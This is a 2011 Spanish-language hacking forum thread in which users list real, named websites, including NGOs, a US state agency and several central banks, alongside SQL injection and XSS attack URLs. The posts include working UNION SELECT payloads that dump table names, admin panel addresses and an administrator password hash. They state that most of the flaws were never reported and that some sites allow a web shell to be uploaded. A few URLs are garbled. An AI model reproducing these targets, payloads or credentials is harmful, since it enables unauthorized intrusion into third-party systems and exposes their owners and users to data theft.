• Auditoria Web

  • Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
Aquí se discutirán las principales técnicas usadas para auditar las aplicaciones web, técnicas como SQL Injection, XSS, CSRF, etc.
 #312604  por CyRuX
 08 Ago 2011, 09:42
Web:

http://www.dinebaltimore.com
http://www.muzikreviews.com
http://www.allanhouser.com
http://www.africasia.com
http://www.basketme.com
http://www.cupid.biz
http://www.apachecafe.info
http://wordtheatre.com
http://www.astroafricaeu.com
http://wordtheatre.com
http://www.unifem.org
http://hartmanarena.com
http://www.software.com.ec
http://www.inversionistasonora.com
http://score.dnr.sc.gov
http://www.stgeorgesbristol.co.uk
http://www.adrenalinelacrosse.com
http://www.worldmusicinstitute.org
http://www.highlandvillage.org
http://www.coorslightpr.com
http://www.maimonides.cl
http://www.magina.org
http://www.soloascenso.com.ar
http://www.galenored.com

=============================================

Bug:

http://www.dinebaltimore.com/review.php ... ----c:(web encontrada pass:aa844643126fb6fedcd012933b4ae494 login;admin. panel--C:http://www.jornadanet.com/Hemeroteca/
http://www.muzikreviews.com/reviews.php ... ----c:(web con 3 bases de datos y se encontro el el user y pass pero no se pudo decifrar)
http://www.allanhouser.com/newsDetail.p ... -C:(tablas encontradas pero hash no se puede crackear)
http://www.africasia.com/services/opini ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
http://www.basketme.com/2.0/opinion.php ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
http://www.cupid.biz/support/opinions.p ... ----c:(web con todas las tablas pero ninguna interesante.)
http://www.apachecafe.info/event.php?display=event&id='
http://wordtheatre.com/events/event.php?id='
http://www.astroafricaeu.com/event.php? ... ---------C: sacadas todas las tablas menos las del admin..!
http://wordtheatre.com/events/event.php?id='
http://www.unifem.org/cedaw30/events_ca ... ?EventID='
http://hartmanarena.com/event.php?id='
http://www.software.com.ec/noticiasver.php?id='
http://www.inversionistasonora.com/noti ... ,5,6,7,8--
http://score.dnr.sc.gov/deep.php?subject='
http://www.stgeorgesbristol.co.uk/event.php?pid='
http://www.adrenalinelacrosse.com/videos.php?cid='
http://www.worldmusicinstitute.org/event.php?id='
http://www.highlandvillage.org/event.php?id='
http://www.coorslightpr.com/event.php?id='
http://www.maimonides.cl/detalle_articu ... ,1,2,3,4,5
http://www.magina.org/noticias.php?id='
http://www.soloascenso.com.ar/noticias.php?id='
http://www.galenored.com/noticias.php?id='

=============================================
Metodo:
SQL,XSS
=============================================
Descubridor:
CyRuX
=============================================
Comentarios:
Ninguna fue reportado..!¬¬
pero todas esta con los datos necesario. Login: y Pass:
algunas tienen uplaod para la introduccion de 1 web-Shell
 #312728  por rhector123
 08 Ago 2011, 22:52
wow !! eres un Maniaco CyRuX jajaj nada solo una Pequeña Broma Muy Buen Aporte CyRuX BUeno aki vamos :

Web: http://www.hankook.cl/

Bug: http://www.hankook.cl/detalle.php?id=133%

Panel: http://www.hankook.cl/admin/

Descubridor: rhector123

Metodo: SQL

Comentarios: Bueno reportado 5 veces sin respuestas Por eso lo hago Publico

otra cosa mas hay un bug mas, se puede saltar el logeo xD del admin
el administrador deberia poner mas interes en su seguridad xD bueno eso es todo.

un saludo Atte By rhector123
 #312795  por CyRuX
 09 Ago 2011, 06:31
Web:
http://www.estrellasorientales.com.do
Bug:
Código: Seleccionar todo
http://www.estrellasorientales.com.do/noticias.php?id=-1+union+select+all+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7+from+information_schema.tables--
Panel:
http://www.estrellasorientales.com.do/cpanel/
Metodo:
SQL

Comentario:
No se ah reportado..! pondria los datos del admin
pero creo que seria demasiado..!

Network:iranserv Server
rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
 #312818  por CyRuX
 09 Ago 2011, 08:35
WEB:
http://www.cac-acc.org

BUG:
Código: Seleccionar todo
http://www.cac-acc.org/news.php?id=-1+union+select+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
Panel:
NO encontrado..!

Metodo:
SQL!

Descubridor:
CyRuX

Comentario:
No reportado..! Ni pienso hacerlo..!¬¬

=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
Network:iranserv Server:rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
 #324029  por KHC
 10 Oct 2011, 04:11
Banco de rusia:
http://www.cbr.ru/eng/bank( =notes_coins/base_of_memora‚ble_coins/e_coins1.asp?cat_‚num=5216-0060

Metodo: Asp Injection
 #324030  por KHC
 10 Oct 2011, 04:13
Banco central de bahrain:

http://www.cbb.gov.bh/prinx 4page.php?page=sitemap
 #324032  por KHC
 10 Oct 2011, 04:14
Banco de Blangadesh:

http://www.bangladesh-bank( >org/aboutus/dept/dept_deta‚ils.php?callfrom=tababoutus‚&dept_id=74

PD: tiene errores logicos, y muy obvios para uqe no metan las manos donde no los kiddies!
 #324033  por KHC
 10 Oct 2011, 04:15
Banco de Bolivia:

http://www.bcb.gob.bo/index 8.php?q=institucional/estad‚os_financieros&button2=Busc‚ar&mes=2011

Metodo: SQL Injection
Última edición por KHC el 10 Oct 2011, 04:16, editado 1 vez en total.
 #324034  por KHC
 10 Oct 2011, 04:16
Banco de Cambodia:

http://www.nbc.org.kh/publh 9cations.asp?tp=a

Metodo: Asp Injection
 #324036  por KHC
 10 Oct 2011, 04:18
Banco Central de iraq:

http://www.cbi.iq/index.php ?pid=%22%3E%3Ca%20href=%22‚http://google.com%22%3EBe%2‚0Happy,%20click%20here%3C/h 1%3E
  • 1
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14